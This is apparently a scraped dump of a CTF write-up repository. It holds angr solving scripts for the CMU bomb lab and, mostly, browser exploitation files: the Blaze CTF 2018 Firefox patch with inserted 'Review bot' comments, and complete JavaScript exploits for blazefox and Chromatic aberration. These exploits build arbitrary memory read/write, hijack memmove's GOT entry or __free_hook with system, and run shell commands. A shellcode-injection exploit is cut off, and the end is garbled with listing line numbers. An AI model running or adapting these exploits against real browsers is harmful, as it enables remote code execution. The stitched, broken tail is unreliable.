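def satisfies(flag, text=IDA_CONDITIONS):
    """Re-check a candidate the way the binary does: strlen > 0x26 and every equality."""
    if not 0x26 < len(flag) <= len(VARS):
        return False
    env = dict(zip(VARS, (ord(c) for c in flag)))
    return all(sum(c * env.get(v, 0) for c, v in zip(row, VARS)) == const
               for row, const in map(parse_condition, conditions(text)))
```

`solve_flag()` returns the only input that passes all 39 checks (the system has full rank), and `satisfies()` re-verifies any candidate against the same conditions.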
--------------------------------------------------------------------------------
/angr/cmu_bomb_lab_ref/bomb.py:
--------------------------------------------------------------------------------
# Python 2 script written against the legacy angr API (path_group, state.se).
import angr

#start_addr=0x400efc
target_addr=0x400f3c
avoid_addr=0x40143a
explode=(0x400f10,0x400f20)

start = 0x400f0a
#start = 0x400f0a # Where the path begin
end = 0x400f3c # Where we want to go
explode = (0x400f10, 0x400f20) # The addresses of explosions

proj = angr.Project('./bomb', load_options={'auto_load_libs':False}) # load the binary

state = proj.factory.blank_state(addr=start) # Create the path

# Push the 6 digits returned by our read_six_numbers function.
for i in xrange(6):
    state.stack_push(state.se.BVS('int_{}'.format(i), 4*8))

# Create and explore the function
path = proj.factory.path_group(state)
ex = path.explore(find=end, avoid=explode)

if ex.found:
    found = ex.found[0].state

    answer = []

    # Pop 3 64bit integers from the stack
    # we will convert them to 32 bit values

    for x in xrange(3):
        curr_int = found.se.any_int(found.stack_pop())

        answer.append(str(curr_int & 0xffffffff))
        answer.append(str(curr_int >> 32))

    print(" ".join(answer))
--------------------------------------------------------------------------------
/angr/cmu_bomb_lab_ref/bomb2.py:
--------------------------------------------------------------------------------
# Python 2 script written against the legacy angr API (path_group, state.se).
import angr

start = 0x400F60
#start = 0x400f0a # Where the path begin
end = 0x400FC9 # Where we want to go
explode = (0x400fc4, 0x400fad,0x400F65) # The addresses of explosions

proj = angr.Project('./bomb', load_options={'auto_load_libs':False}) # load the binary

state = proj.factory.blank_state(addr=start) # Create the path

# Push the 2 digits returned by our scanf.
for i in xrange(2):
    state.stack_push(state.se.BVS('int_{}'.format(i), 4*8))

# Create and explore the function
path = proj.factory.path_group(state)
ex = path.explore(find=end, avoid=explode)

if ex.found:
    found = ex.found[0].state

    answer = []

    # Pop 3 64bit integers from the stack
    # we will convert them to 32 bit values
    # one 64bit integer holds 2 numbers
    # popping 3 outputs 6
    for x in xrange(3):
        curr_int = found.se.any_int(found.stack_pop())

        answer.append(str(curr_int & 0xffffffff))
        answer.append(str(curr_int >> 32))

    print(" ".join(answer))
--------------------------------------------------------------------------------
/angr/cmu_bomb_lab_ref/bomb_layer5.py:
--------------------------------------------------------------------------------
# Python 2 script written against the legacy angr API (path_group, state.se).
import angr

start = 0x401062 #start point of phase5
#start = 0x40107f #start point of phase5 no ok
end = 0x4010EE # Where we want to go
explode = (0x401084,0x4010C6) # The addresses of explosions


proj = angr.Project('./bomb', load_options={'auto_load_libs':False}) # load the binary

state = proj.factory.blank_state(addr=start) # Create the path
password_addr = 0x100 # The arbitrary address of the string
password_lenght = 6 # The length of the string
password = state.se.BVS('password', password_lenght*8) #We create the symbolic bitvector string

state.memory.store(password_addr, password) # We store the BVS at the arbitrary address

# We set the constraint of printable chars on the input.
for i in xrange(password_lenght):
    m = state.memory.load(password_addr + i, 1)
    state.add_constraints(m >= 0x20)
    state.add_constraints(m <= '}')

# We pass the string's address in rdi (first argument register)
state.regs.rdi = password_addr

# Create and explore the function
path = proj.factory.path_group(state)
ex = path.explore(find=end, avoid=explode)

if ex.found:
    found = ex.found[0].state

    res = found.se.any_str(password) # Print the result string

    print(res)
--------------------------------------------------------------------------------
/angr/cmu_bomb_lab_ref/bomb_layer_4.py:
--------------------------------------------------------------------------------
# Python 2 script written against the legacy angr API (path_group, state.se).
import angr


# can start at 0x40102c rather than 0x401029,
# because that is the jump instruction
#.text:0000000000401029 cmp eax, 2
#.text:000000000040102C jnz short loc_401035
#start = 0x401029
start = 0x40100c #the start point of the function, but slower
#start = 0x400f0a # Where the path begin
end = 0x40105D # Where we want to go
explode = (0x401035,0x401058) # The addresses of explosions

proj = angr.Project('./bomb', load_options={'auto_load_libs':False}) # load the binary

state = proj.factory.blank_state(addr=start) # Create the path

# Push the 2 digits returned by our scanf.
for i in xrange(2):
    state.stack_push(state.se.BVS('int_{}'.format(i), 4*8))

# Create and explore the function
path = proj.factory.path_group(state)
ex = path.explore(find=end, avoid=explode)

if ex.found:
    found = ex.found[0].state

    answer = []

    # Pop 3 64bit integers from the stack
    # we will convert them to 32 bit values
    # one 64bit integer holds 2 numbers
    # popping 3 outputs 6
    for x in xrange(3):
        curr_int = found.se.any_int(found.stack_pop())

        answer.append(str(curr_int & 0xffffffff))
        answer.append(str(curr_int >> 32))

    print(" ".join(answer))
--------------------------------------------------------------------------------
/angr/cmu_bomb_lab_ref/readme.md:
--------------------------------------------------------------------------------
Obtained all the addresses while redoing the example.

Reference: http://pandhack.tk/posts/cmu-binary-bomb
--------------------------------------------------------------------------------
/angr/readme.md:
--------------------------------------------------------------------------------
Angr for dummies
========

This repo mainly serves as a reference for angr scripting.

The code is copied from the internet, with extra comments and images added for reference.







Useful Link:
==========


[angr io](https://docs.angr.io/)

[basic](https://github.com/wwkenwong/angr-doc/blob/master/docs/toplevel.md)

[angr api](http://angr.io/api-doc/)

--------------------------------------------------------------------------------
/angr_type/Defcon_crackme1/crackme1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr_type/Defcon_crackme1/crackme1
--------------------------------------------------------------------------------
/angr_type/Defcon_crackme1/readme.md:
--------------------------------------------------------------------------------
Use IDA Pro.

You can see the process map.

Jump to sub_c6c.

From rbp+1, rbp+2

we can think of it as a char array.

Using an ASCII table, we can read it.

http://asiagaming.tistory.com/24


http://www.asciitable.com/index/asciifull.gif
--------------------------------------------------------------------------------
/browser/34C3_V9/readme.md:
--------------------------------------------------------------------------------
#



# Reference

1. [pctf v8 analysis](http://blog.leanote.com/post/mut3p1g/pctf-v8-%E5%88%86%E6%9E%90)

2. [v8 exploit introduction](https://xz.aliyun.com/t/5190)
--------------------------------------------------------------------------------
/browser/Blaze_CTF_2018_blazefox/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/Blaze_CTF_2018_blazefox/1.png
--------------------------------------------------------------------------------
/browser/Blaze_CTF_2018_blazefox/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/Blaze_CTF_2018_blazefox/2.png
--------------------------------------------------------------------------------
/browser/Blaze_CTF_2018_blazefox/2_labelled.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/Blaze_CTF_2018_blazefox/2_labelled.png
--------------------------------------------------------------------------------
/browser/Blaze_CTF_2018_blazefox/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/Blaze_CTF_2018_blazefox/3.png
--------------------------------------------------------------------------------
/browser/Blaze_CTF_2018_blazefox/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/Blaze_CTF_2018_blazefox/4.png
--------------------------------------------------------------------------------
/browser/Blaze_CTF_2018_blazefox/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/Blaze_CTF_2018_blazefox/5.png
--------------------------------------------------------------------------------
/browser/Blaze_CTF_2018_blazefox/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/Blaze_CTF_2018_blazefox/6.png
--------------------------------------------------------------------------------
/browser/Blaze_CTF_2018_blazefox/README.txt:
--------------------------------------------------------------------------------
This is a standard build of firefox nightly pulled on 4/6.

How it was built:
Following https://developer.mozilla.org/en-US/docs/Mozilla/Developer_guide/Build_Instructions/Simple_Firefox_build/Linux_and_MacOS_build_preparation

python bootstrap.py
hg clone https://hg.mozilla.org/mozilla-central
hg checkout ee6283795f41
hg import blaze.patch --no-commit
./mach build

The larger download contains the built firefox and the docker env.

We run it in the docker container with
/firefox/dist/bin/firefox --headless
The container has a profile to disable sandboxing, you're welcome

The flag is in /flag in the container.

--------------------------------------------------------------------------------
/browser/Blaze_CTF_2018_blazefox/blaze.patch:
--------------------------------------------------------------------------------
diff -r ee6283795f41 js/src/builtin/Array.cpp
--- a/js/src/builtin/Array.cpp Sat Apr 07 00:55:15 2018 +0300
+++ b/js/src/builtin/Array.cpp Sun Apr 08 00:01:23 2018 +0000
@@ -192,6 +192,20 @@
 return ToLength(cx, value, lengthp);
 }
 
+static MOZ_ALWAYS_INLINE bool
+BlazeSetLengthProperty(JSContext* cx, HandleObject obj, uint64_t length)
+{
+ if (obj->is()) {
+ obj->as().setLengthInt32(length);
+ obj->as().setCapacityInt32(length);
+ obj->as().setInitializedLengthInt32(length);
+ return true;
+ }
+ return false;
+}
+
+
+
 /*
 * Determine if the id represents an array index.
 *
@@ -1578,6 +1592,23 @@
 return DenseElementResult::Success;
 }
 
+bool js::array_blaze(JSContext* cx, unsigned argc, Value* vp)
+{
+ CallArgs args = CallArgsFromVp(argc, vp);
+ RootedObject obj(cx, ToObject(cx, args.thisv()));
+ if (!obj)
+ return false;
+
+ if (!BlazeSetLengthProperty(cx, obj, 420))
+ return false;
+
+ //uint64_t l = obj.as().setLength(cx, 420);
+
+ args.rval().setObject(*obj);
+ return true;
+}
+
+
 // ES2017 draft rev 1b0184bc17fc09a8ddcf4aeec9b6d9fcac4eafce
 // 22.1.3.21 Array.prototype.reverse ( )
 bool
@@ -3511,6 +3542,8 @@
 JS_FN("unshift", array_unshift, 1,0),
 JS_FNINFO("splice", array_splice, &array_splice_info, 2,0),
 
+ JS_FN("blaze", array_blaze, 0,0),
+
 /* Pythonic sequence methods. */
 JS_SELF_HOSTED_FN("concat", "ArrayConcat", 1,0),
 JS_INLINABLE_FN("slice", array_slice, 2,0, ArraySlice),
diff -r ee6283795f41 js/src/builtin/Array.h
--- a/js/src/builtin/Array.h Sat Apr 07 00:55:15 2018 +0300
+++ b/js/src/builtin/Array.h Sun Apr 08 00:01:23 2018 +0000
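Review bot: BlazeSetLengthProperty in the @@ -192,6 +192,20 @@ hunk of js/src/builtin/Array.cpp writes the caller's `length` into the elements header's length, capacity and initializedLength without growing, reallocating or bounds-checking the backing store, so any value larger than the real allocation turns every dense-element read and write past it into an out-of-bounds heap access; capacity and initializedLength should be left to the allocation path, and a length change should go through the existing ToLength/setLength logic that resizes storage. The `uint64_t length` is also narrowed to the uint32_t setters with no range check, and the three `obj->is()` / `obj->as()` calls appear here without their template arguments, which would not compile as shown (most likely lost in transcription).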
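Review bot: js::array_blaze in the @@ -1578,6 +1592,23 @@ hunk returns false when BlazeSetLengthProperty fails (a non-array `this`) without reporting an error, which breaks the JSNative contract that a false return comes with a pending exception; report a type error there, or check that `obj` is an ArrayObject before the call. The hard-coded 420 is applied regardless of the array's actual allocation, and the commented-out `//uint64_t l = obj.as().setLength(cx, 420);` is dead code that should be dropped.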
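Review bot: the @@ -3511,6 +3542,8 @@ hunk registers `JS_FN("blaze", array_blaze, 0,0)` in the Array.prototype method table, so any script can corrupt an array's length, capacity and initializedLength; a primitive like this must not be reachable from content, and if it is needed for testing it belongs in a testing-only function set that is off by default, not among the standard Array methods. A test or at least a comment explaining why the method exists is also missing.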
@@ -166,6 +166,9 @@
 array_reverse(JSContext* cx, unsigned argc, js::Value* vp);
 
 extern bool
+array_blaze(JSContext* cx, unsigned argc, js::Value* vp);
+
+extern bool
 array_splice(JSContext* cx, unsigned argc, js::Value* vp);
 
 extern const JSJitInfo array_splice_info;
diff -r ee6283795f41 js/src/vm/ArrayObject.h
--- a/js/src/vm/ArrayObject.h Sat Apr 07 00:55:15 2018 +0300
+++ b/js/src/vm/ArrayObject.h Sun Apr 08 00:01:23 2018 +0000
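Review bot: the @@ -166,6 +166,9 @@ hunk of js/src/builtin/Array.h declares `array_blaze` between array_reverse and array_splice with no comment; the neighbouring natives each implement a standard Array.prototype method, so a declaration for a non-standard one should say what it does and that it is not spec behaviour.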
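Review bot: the @@ -60,6 +60,14 @@ hunk of js/src/vm/ArrayObject.h adds setCapacityInt32 and setInitializedLengthInt32 that assign straight into getElementsHeader() with no assertion that the new value fits the allocated elements storage or that initializedLength stays at or below capacity; those two fields are the invariants dense-element access relies on to stay in bounds, so either add MOZ_ASSERT checks against the allocated size or do not expose public setters for them at all.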
@@ -60,6 +60,14 @@
 getElementsHeader()->length = length;
 }
 
+ void setCapacityInt32(uint32_t length) {
+ getElementsHeader()->capacity = length;
+ }
+
+ void setInitializedLengthInt32(uint32_t length) {
+ getElementsHeader()->initializedLength = length;
+ }
+
 // Make an array object with the specified initial state.
 static inline ArrayObject*
 createArray(JSContext* cx,
--------------------------------------------------------------------------------
/browser/Blaze_CTF_2018_blazefox/pwn.js:
--------------------------------------------------------------------------------
//double to int
function d_to_i2(d){
    var a = new Uint32Array(new Float64Array([d]).buffer);
    return [a[1], a[0]];
}

//int to double
function i2_to_d(x){
    return new Float64Array(new Uint32Array([x[1], x[0]]).buffer)[0];
}

function i2_to_hex(i2){
    var v1 = ("00000000" + i2[0].toString(16)).substr(-8);
    var v2 = ("00000000" + i2[1].toString(16)).substr(-8);
    return [v1,v2];
}
function p_i2(d){
    print(i2_to_hex(d_to_i2(d))[0]+i2_to_hex(d_to_i2(d))[1])

}

function debug_log(x){
    return console.log("[DEBUG] "+x)
}

function hex(i2){
    return "0x" + ("00000000" + i2[0].toString(16)).slice(-8) + ("00000000" + i2[1].toString(16)).slice(-8);
}

var oob_Array=new Array(1)
oob_Array[0]=0x71717171

var uint32_Array=new Uint32Array(0x2000)
for(var i=0; i<0x2000; i=i+1) {uint32_Array[i]=0x4141414141}

oob_Array.blaze()

//find the function size tag(0x2000) from the oob array
uint32_baseaddress_offset=0
for (i=0; i<0x2000; i++)
{
    if(oob_Array[i]==0x2000)
    {
        print('uInt32Array found');
        uint32_baseaddress_offset=i+2
        break;
    }
}
// array address of the original object
// overwrite for arbitrary oob
console.log("address of the buffer")
p_i2(oob_Array[uint32_baseaddress_offset]);
// empty element header
// use for de PIE
console.log("address of emptyelement")
p_i2(oob_Array[uint32_baseaddress_offset-4]);




//read memory content
function read64(addr){
    console.log(addr);
    oob_Array[uint32_baseaddress_offset]=i2_to_d(addr);
    // return the first two blocks of hex of the addr
    return [uint32_Array[1],uint32_Array[0]]
}

//write memory
function write4(addr,value){
    oob_Array[uint32_baseaddress_offset]=i2_to_d(addr);
    uint32_Array[0]=value[1];
    uint32_Array[1]=value[0];
}

//>>> hex(e.got["memmove"])
//'0x2354040'
//>>> hex(e.got["system"])
//'0x23540b0'


// on js shell, we just leak the no aslr memmove
// then calculate the offset
// dont know why it did not call memmove in headless mode
fopen_got=[0,0x2354050]
fopen_leak=read64(fopen_got);
console.log("leaked fopen");
debug_log(fopen_leak)
print(hex(fopen_leak))
//libc from system libc

libc_base= [fopen_leak[0],fopen_leak[1]-0x6dd70]
system =[libc_base[0],libc_base[1]+0x45390]

//trick from saelo
var target = new Uint8Array(100);
var cmd = "id;xcalc";
for (var i = 0; i < cmd.length; i++) {
    target[i] = cmd.charCodeAt(i);
}
// got hijacking
memmove_got=[0,0x2354040]
write4(memmove_got,system)


//shell
console.log("[+] PWNED")
target.copyWithin(0,1)

--------------------------------------------------------------------------------
/browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/1.jpg
--------------------------------------------------------------------------------
/browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/2.jpg
--------------------------------------------------------------------------------
/browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/3.jpg
--------------------------------------------------------------------------------
/browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/6d87044f837a59e649f6d799143aede299a3103e764f8c46c921c3ee16da773a_chromatic_aberration.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/6d87044f837a59e649f6d799143aede299a3103e764f8c46c921c3ee16da773a_chromatic_aberration.7z
--------------------------------------------------------------------------------
/browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/pwn_no_comment.js:
--------------------------------------------------------------------------------
function gc() { for (let i = 0; i < 0x10; i++) new ArrayBuffer(0x1000000);}

var tarr = new BigUint64Array(8);
tarr[0] = 0x33313131n;
tarr[1] = 0x32323232n;

var ab = []
for (var i = 0; i < 0x200; i++) {ab.push(new ArrayBuffer(0x1337));}
var oob_str_arr = ['AAAAAAAA','BBBBBBBB','CCCCCCCC']
gc();
gc();
console.log('[+] Locate relative postion of tarr')

var tarr_ix = 0;
for (var i = 0; i < 4000; i++) { if(oob_str_arr[0].charCodeAt(-1620000-i) == 0x33 & oob_str_arr[0].charCodeAt(-1620000-i-1) == 0x31& oob_str_arr[0].charCodeAt(-1620000-i-2) == 0x31& oob_str_arr[0].charCodeAt(-1620000-i-3) == 0x31){tarr_ix=i;};}
console.log(tarr_ix);
console.log('[+] Locate array buffer')

var ab_ix = 0;
for (var i = 0; i < 4000; i++) { if(oob_str_arr[0].charCodeAt(-1620000-i) == 0x13 & oob_str_arr[0].charCodeAt(-1620000-i-1) == 0x37){ab_ix=i;};}


console.log(ab_ix);

diff = 650
tarr.fill(0x4000n,Math.floor(diff/8)-1,Math.floor(diff/8));

var corrupted_ix = 0;

for (var i = 0; i < 0x200; i++){if (ab[i].byteLength!=0x1337){corrupted_ix =i;}};


var leak_base_offset = 0x1e90n
var base_offset = 0x7fe2f0n
var cxa = 0x1474718n


var up_byte = 0;
var lo_byte = 0;

for (var i = 0; i < 10000; i++) { if(oob_str_arr[0].charCodeAt(-1620000-i) == 0 & oob_str_arr[0].charCodeAt(-1620000-i-1) == 0& oob_str_arr[0].charCodeAt(-1620000-i-2) == 0& oob_str_arr[0].charCodeAt(-1620000-i-3) == 7& oob_str_arr[0].charCodeAt(-1620000-i+1) >0& oob_str_arr[0].charCodeAt(-1620000-i+2) >0) {up_byte = oob_str_arr[0].charCodeAt(-1620000-i+2); lo_byte = oob_str_arr[0].charCodeAt(-1620000-i+1) ; break;}}


var addr_space = BigInt(0x100000000*(lo_byte+(up_byte*0x100)));

console.log(addr_space)

var leak_base = addr_space+leak_base_offset
tarr.fill(leak_base,Math.floor(diff/8),Math.floor(diff/8)+1);
var b64 = new BigUint64Array(ab[corrupted_ix])

var bin_base = b64[0] - base_offset
console.log(bin_base)

var cxa_handler = bin_base+cxa

console.log(cxa_handler)

tarr.fill(cxa_handler,Math.floor(diff/8),Math.floor(diff/8)+1);
var b64 = new BigUint64Array(ab[corrupted_ix])
gi_abort = b64[0]
local = 0x406c0n
libc_base = gi_abort-local
free_hook = libc_base + 0x3ed8e8n
system = libc_base + 0x4f440n
tarr.fill(free_hook,Math.floor(diff/8),Math.floor(diff/8)+1);

var b64 = new BigUint64Array(ab[corrupted_ix])

b64[0] = system
console.log('sh')

--------------------------------------------------------------------------------
/browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/pwn_with_logs.js:
--------------------------------------------------------------------------------
function gc() { for (let i = 0; i < 0x10; i++) new ArrayBuffer(0x1000000);}

var tarr = new BigUint64Array(8);
tarr[0] = 0x33313131n;
tarr[1] = 0x32323232n;

var ab = []
for (var i = 0; i < 0x200; i++) {ab.push(new ArrayBuffer(0x1337));}
var oob_str_arr = ['AAAAAAAA','BBBBBBBB','CCCCCCCC']
gc();
gc();
console.log('[+] Locate relative postion of tarr')

var tarr_ix = 0;
for (var i = 0; i < 4000; i++) { if(oob_str_arr[0].charCodeAt(-1620000-i) == 0x33 & oob_str_arr[0].charCodeAt(-1620000-i-1) == 0x31& oob_str_arr[0].charCodeAt(-1620000-i-2) == 0x31& oob_str_arr[0].charCodeAt(-1620000-i-3) == 0x31){tarr_ix=i;};}
console.log(tarr_ix);
console.log('[+] Locate array buffer')

var ab_ix = 0;
for (var i = 0; i < 4000; i++) { if(oob_str_arr[0].charCodeAt(-1620000-i) == 0x13 & oob_str_arr[0].charCodeAt(-1620000-i-1) == 0x37){ab_ix=i;};}


console.log(ab_ix);

// 650 is the threshold calculated from running the code in a debugger
// weird
diff = 650//tarr_ix-ab_ix;
console.log('[+] Difference : ')
console.log(diff)


tarr.fill(0x4000n,Math.floor(diff/8)-1,Math.floor(diff/8));

var corrupted_ix = 0;

console.log('[+] Now we corrupted one of the array size :)')
for (var i = 0; i < 0x200; i++){if (ab[i].byteLength!=0x1337){corrupted_ix =i;}};


var leak_base_offset = 0x1e90n
var base_offset = 0x7fe2f0n
var cxa = 0x1474718n

console.log('[+] Next we leak the mapped base ')


var up_byte = 0;
var lo_byte = 0;

for (var i = 0; i < 10000; i++) { if(oob_str_arr[0].charCodeAt(-1620000-i) == 0 & oob_str_arr[0].charCodeAt(-1620000-i-1) == 0& oob_str_arr[0].charCodeAt(-1620000-i-2) == 0& oob_str_arr[0].charCodeAt(-1620000-i-3) == 7& oob_str_arr[0].charCodeAt(-1620000-i+1) >0& oob_str_arr[0].charCodeAt(-1620000-i+2) >0) {up_byte = oob_str_arr[0].charCodeAt(-1620000-i+2); lo_byte = oob_str_arr[0].charCodeAt(-1620000-i+1) ; break;}}


var addr_space = BigInt(0x100000000*(lo_byte+(up_byte*0x100)));

console.log(addr_space)

var leak_base = addr_space+leak_base_offset
tarr.fill(leak_base,Math.floor(diff/8),Math.floor(diff/8)+1);
var b64 = new BigUint64Array(ab[corrupted_ix])

var bin_base = b64[0] - base_offset
console.log(bin_base)

var cxa_handler = bin_base+cxa

console.log(cxa_handler)

tarr.fill(cxa_handler,Math.floor(diff/8),Math.floor(diff/8)+1);
var b64 = new BigUint64Array(ab[corrupted_ix])
gi_abort = b64[0]
local = 0x406c0n
remote = 0x25414n
libc_base = gi_abort-local
free_hook = libc_base + 0x3ed8e8n // 0x1e75a8
system = libc_base + 0x4f440n // 0x52fd0
tarr.fill(free_hook,Math.floor(diff/8),Math.floor(diff/8)+1);

var b64 = new BigUint64Array(ab[corrupted_ix])
b64[0] = system
console.log('sh')
--------------------------------------------------------------------------------
/browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/solved.js:
--------------------------------------------------------------------------------
function gc() { for (let i = 0; i < 0x10; i++) new ArrayBuffer(0x1000000);};var tarr = new BigUint64Array(8);tarr[0] = 0x33313131n;tarr[1] = 0x32323232n;var ab = [];for (var i = 0; i < 0x200; i++) {ab.push(new ArrayBuffer(0x1337));};var oob_str_arr = ['AAAAAAAA','BBBBBBBB','CCCCCCCC'];gc();gc();var tarr_ix = 0;for (var i = 0; i < 4000; i++) { if(oob_str_arr[0].charCodeAt(-1620000-i) == 0x33 & oob_str_arr[0].charCodeAt(-1620000-i-1) == 0x31& oob_str_arr[0].charCodeAt(-1620000-i-2) == 0x31& oob_str_arr[0].charCodeAt(-1620000-i-3) == 0x31){tarr_ix=i;};};var ab_ix = 0;for (var i = 0; i < 4000; i++) { if(oob_str_arr[0].charCodeAt(-1620000-i) == 0x13 & oob_str_arr[0].charCodeAt(-1620000-i-1) == 0x37){ab_ix=i;};};diff = 650;tarr.fill(0x4000n,Math.floor(diff/8)-1,Math.floor(diff/8));var corrupted_ix = 0;
for (var i = 0; i < 0x200; i++){if (ab[i].byteLength!=0x1337){corrupted_ix =i;};};var leak_base_offset = 0x1e90n; var base_offset = 0x7fe2f0n; var cxa = 0x1474718n;var up_byte = 0;var lo_byte = 0;for (var i = 0; i < 10000; i++) { if(oob_str_arr[0].charCodeAt(-1620000-i) == 0 & oob_str_arr[0].charCodeAt(-1620000-i-1) == 0& oob_str_arr[0].charCodeAt(-1620000-i-2) == 0& oob_str_arr[0].charCodeAt(-1620000-i-3) == 7& oob_str_arr[0].charCodeAt(-1620000-i+1) >0& oob_str_arr[0].charCodeAt(-1620000-i+2) >0) {up_byte = oob_str_arr[0].charCodeAt(-1620000-i+2); lo_byte = oob_str_arr[0].charCodeAt(-1620000-i+1) ; break;};};var addr_space = BigInt(0x100000000*(lo_byte+(up_byte*0x100))); var leak_base = addr_space+leak_base_offset;tarr.fill(leak_base,Math.floor(diff/8),Math.floor(diff/8)+1);var b64 = new BigUint64Array(ab[corrupted_ix]);var bin_base = b64[0] - base_offset;var cxa_handler = bin_base+cxa;tarr.fill(cxa_handler,Math.floor(diff/8),Math.floor(diff/8)+1);var b64 = new BigUint64Array(ab[corrupted_ix]);gi_abort = b64[0];remote = 0x25414n;libc_base = gi_abort-remote;free_hook=libc_base+0x1e75a8n;system=libc_base+0x52fd0n;tarr.fill(free_hook,Math.floor(diff/8),Math.floor(diff/8)+1);var b64 = new BigUint64Array(ab[corrupted_ix]);console.log('run shell');b64[0] = system;console.log('sh');


/*
drwxr-xr-x 1 65534 65534 4096 Mar 13 19:26 .
drwxrwxrwt 9 1000 1000 180 Mar 15 18:40 ..
8 | drwxr-xr-x 2 65534 65534 4096 Mar 13 19:26 bin 9 | -rwxr-xr-x 1 65534 65534 463 Mar 13 17:41 entrypoint.sh 10 | -rw-r--r-- 1 65534 65534 36 Mar 13 17:41 flagishere 11 | -rw-r--r-- 1 65534 65534 556 Mar 13 17:41 pow.py 12 | -rw-r--r-- 1 65534 65534 327 Mar 13 17:41 server.py 13 | pwd 14 | /app 15 | ls 16 | bin 17 | entrypoint.sh 18 | flagishere 19 | pow.py 20 | server.py 21 | cat flagishere 22 | p4{c0mPIling_chr@mium_1s_h4rd_ok?} 23 | */ 24 | -------------------------------------------------------------------------------- /browser/Codegate_CTF_2017_Preliminary_jsworld/fuzzer/a.js: -------------------------------------------------------------------------------- 1 | //double to int 2 | function d_to_i2(d){ 3 | var a = new Uint32Array(new Float64Array([d]).buffer); 4 | return [a[1], a[0]]; 5 | } 6 | 7 | //int to double 8 | function i2_to_d(x){ 9 | return new Float64Array(new Uint32Array([x[1], x[0]]).buffer)[0]; 10 | } 11 | 12 | function i2_to_hex(i2){ 13 | var v1 = ("00000000" + i2[0].toString(16)).substr(-8); 14 | var v2 = ("00000000" + i2[1].toString(16)).substr(-8); 15 | return [v1,v2]; 16 | } 17 | function p_i2(d){ 18 | print(i2_to_hex(d_to_i2(d))[0]+i2_to_hex(d_to_i2(d))[1]) 19 | 20 | } 21 | 22 | function debug_log(x){ 23 | return console.log("[DEBUG] "+x) 24 | } 25 | 26 | function hex(i2){ 27 | return "0x" + ("00000000" + i2[0].toString(16)).slice(-8) + ("00000000" + i2[1].toString(16)).slice(-8); 28 | } 29 | 30 | var oob_Array=new Array(1) 31 | oob_Array[0]=0x71717171 32 | 33 | var uint32_Array=new Uint32Array(0x1000) 34 | for(var i=0; i<0x1000; i=i+1) {uint32_Array[i]=0x4141414141} 35 | 36 | 37 | //trigger oob 38 | oob_Array.pop() 39 | oob_Array.pop() 40 | 41 | //find the function size tag(0x1337) from the oob array 42 | uint32_baseaddress_offset=0 43 | for (i=0; i<0x1337; i++) 44 | { 45 | if(oob_Array[i]==0x1000) 46 | { 47 | print('uInt32Array found'); 48 | uint32_baseaddress_offset=i+2 49 | break; 50 | } 51 | } 52 | // array address of the original 
object 53 | // overwrite for arbitary oob 54 | print("address of the buffer"); 55 | p_i2(oob_Array[uint32_baseaddress_offset]); 56 | print("location : "+uint32_baseaddress_offset); 57 | 58 | //jit 59 | function ss(arg){ 60 | print('NO SHELL') 61 | } 62 | for (i=0; i<0x20; i++){ 63 | ss(1) 64 | } 65 | 66 | 67 | 68 | //read memory content 69 | function read64(addr){ 70 | console.log(addr); 71 | oob_Array[uint32_baseaddress_offset]=i2_to_d(addr); 72 | // return the first two block of hex of the addr 73 | return [uint32_Array[1],uint32_Array[0]] 74 | } 75 | 76 | //write memory 77 | function write4(addr,value){ 78 | oob_Array[uint32_baseaddress_offset]=i2_to_d(addr); 79 | uint32_Array[0]=value[1]; 80 | uint32_Array[1]=value[0]; 81 | } 82 | 83 | function write(addr, data){ 84 | oob_Array[uint32_baseaddress_offset] = i2_to_d(addr); 85 | uint32_Array[0] = data; 86 | } 87 | 88 | function read(addr){ 89 | oob_Array[uint32_baseaddress_offset] = i2_to_d(addr); 90 | return uint32_Array[0] 91 | } 92 | 93 | 94 | 95 | function shellcodeInject(addr, shellcode){ 96 | var hex = ''; 97 | var shellcodeA=[] 98 | var c=0 99 | for(var i=0; ifastSlice(*exec, begin, end - begin)) 33 | 
